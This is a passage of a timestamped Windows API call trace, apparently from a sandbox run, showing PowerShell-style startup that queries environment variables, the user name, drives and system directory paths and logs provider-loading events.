	[0431.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.429] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.429] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.429] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0431.429] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.429] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.429] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0431.430] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26d030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0431.430] SetErrorMode (uMode=0x1) returned 0x1
	[0431.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d240 | out: lpFileInformation=0x26d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.430] SetErrorMode (uMode=0x1) returned 0x1
	[0431.430] GetLogicalDrives () returned 0x4
	[0431.431] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.431] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.431] SetErrorMode (uMode=0x1) returned 0x1
	[0431.432] CoTaskMemAlloc (cb=0x68) returned 0x17a9a0
	[0431.432] CoTaskMemAlloc (cb=0x68) returned 0x17b180
	[0431.432] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x17a9a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d210, lpMaximumComponentLength=0x26d20c, lpFileSystemFlags=0x26d208, lpFileSystemNameBuffer=0x17b180, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d210*=0x9c354b42, lpMaximumComponentLength=0x26d20c*=0xff, lpFileSystemFlags=0x26d208*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0431.432] CoTaskMemFree (pv=0x17a9a0) 
	[0431.432] CoTaskMemFree (pv=0x17b180) 
	[0431.432] SetErrorMode (uMode=0x1) returned 0x1
	[0431.432] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.432] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.433] SetErrorMode (uMode=0x1) returned 0x1
	[0431.433] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d1b0 | out: lpFileInformation=0x26d1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.433] SetErrorMode (uMode=0x1) returned 0x1
	[0431.433] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.433] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.433] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cd30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.434] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.434] SetErrorMode (uMode=0x1) returned 0x1
	[0431.434] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.434] SetErrorMode (uMode=0x1) returned 0x1
	[0431.434] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.434] SetErrorMode (uMode=0x1) returned 0x1
	[0431.434] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.434] SetErrorMode (uMode=0x1) returned 0x1
	[0431.434] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.435] SetErrorMode (uMode=0x1) returned 0x1
	[0431.435] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d080 | out: lpFileInformation=0x26d080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.435] SetErrorMode (uMode=0x1) returned 0x1
	[0431.435] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.435] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.435] CoTaskMemFree (pv=0xf05a0) 
	[0431.435] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.435] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.436] CoTaskMemFree (pv=0xfc760) 
	[0431.436] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33fce20*="FileSystem", lpRawData=0x33fcbb0) returned 1
	[0431.436] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.436] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.437] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.437] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.437] CoTaskMemFree (pv=0xf05a0) 
	[0431.437] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.437] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.438] CoTaskMemFree (pv=0xfc760) 
	[0431.438] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3402660*="Function", lpRawData=0x34023f0) returned 1
	[0431.438] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.438] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.450] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.450] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.451] CoTaskMemFree (pv=0xf05a0) 
	[0431.451] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.451] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.451] CoTaskMemFree (pv=0xfc760) 
	[0431.451] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34348f0*="Registry", lpRawData=0x3434680) returned 1
	[0431.453] CoTaskMemAlloc (cb=0x804) returned 0xf05a0
	[0431.453] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xf05a0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.465] CoTaskMemFree (pv=0xf05a0) 
	[0431.465] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.465] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.470] CoTaskMemFree (pv=0xfc760) 
	[0431.470] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3439d08*="Variable", lpRawData=0x3439a98) returned 1
	[0431.471] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.471] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.471] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.471] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.595] CoTaskMemAlloc (cb=0x804) returned 0x1b9bf3d0
	[0431.595] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9bf3d0, nSize=0x26d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d488) returned 0x1
	[0431.595] CoTaskMemFree (pv=0x1b9bf3d0) 
	[0431.595] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.595] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d4c8) returned 1
	[0431.596] CoTaskMemFree (pv=0xfc760) 
	[0431.596] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x344d920*="Certificate", lpRawData=0x344d6b0) returned 1
	[0431.645] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.645] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.646] GetLogicalDrives () returned 0x4
	[0431.646] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0431.648] CoTaskMemAlloc (cb=0x20e) returned 0x165690
	[0431.648] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x165690 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0431.648] CoTaskMemFree (pv=0x165690) 
	[0431.648] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.648] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.648] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.648] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.655] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.655] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.657] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.657] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.657] SetErrorMode (uMode=0x1) returned 0x1
	[0431.657] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.658] SetErrorMode (uMode=0x1) returned 0x1
	[0431.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.658] SetErrorMode (uMode=0x1) returned 0x1
	[0431.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.658] SetErrorMode (uMode=0x1) returned 0x1
	[0431.658] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.658] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.661] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.661] SetErrorMode (uMode=0x1) returned 0x1
	[0431.661] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d090 | out: lpFileInformation=0x26d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.661] SetErrorMode (uMode=0x1) returned 0x1
	[0431.661] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.661] SetErrorMode (uMode=0x1) returned 0x1
	[0431.662] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d090 | out: lpFileInformation=0x26d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0431.662] SetErrorMode (uMode=0x1) returned 0x1
	[0431.662] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.662] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0431.662] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.662] SetErrorMode (uMode=0x1) returned 0x1
	[0431.662] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d090 | out: lpFileInformation=0x26d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0431.662] SetErrorMode (uMode=0x1) returned 0x1
	[0431.662] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.662] SetErrorMode (uMode=0x1) returned 0x1
	[0431.662] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d090 | out: lpFileInformation=0x26d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0431.663] SetErrorMode (uMode=0x1) returned 0x1
	[0431.663] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.663] SetErrorMode (uMode=0x1) returned 0x1
	[0431.663] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d090 | out: lpFileInformation=0x26d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.663] SetErrorMode (uMode=0x1) returned 0x1
	[0431.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.663] SetErrorMode (uMode=0x1) returned 0x1
	[0431.663] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d090 | out: lpFileInformation=0x26d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.663] SetErrorMode (uMode=0x1) returned 0x1
	[0431.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.664] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.664] SetErrorMode (uMode=0x1) returned 0x1
	[0431.664] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0431.664] SetErrorMode (uMode=0x1) returned 0x1
	[0431.664] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.664] SetErrorMode (uMode=0x1) returned 0x1
	[0431.664] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0431.665] SetErrorMode (uMode=0x1) returned 0x1
	[0431.665] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0431.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.665] SetErrorMode (uMode=0x1) returned 0x1
	[0431.665] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.665] SetErrorMode (uMode=0x1) returned 0x1
	[0431.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.665] SetErrorMode (uMode=0x1) returned 0x1
	[0431.665] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.665] SetErrorMode (uMode=0x1) returned 0x1
	[0431.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0431.667] SetErrorMode (uMode=0x1) returned 0x1
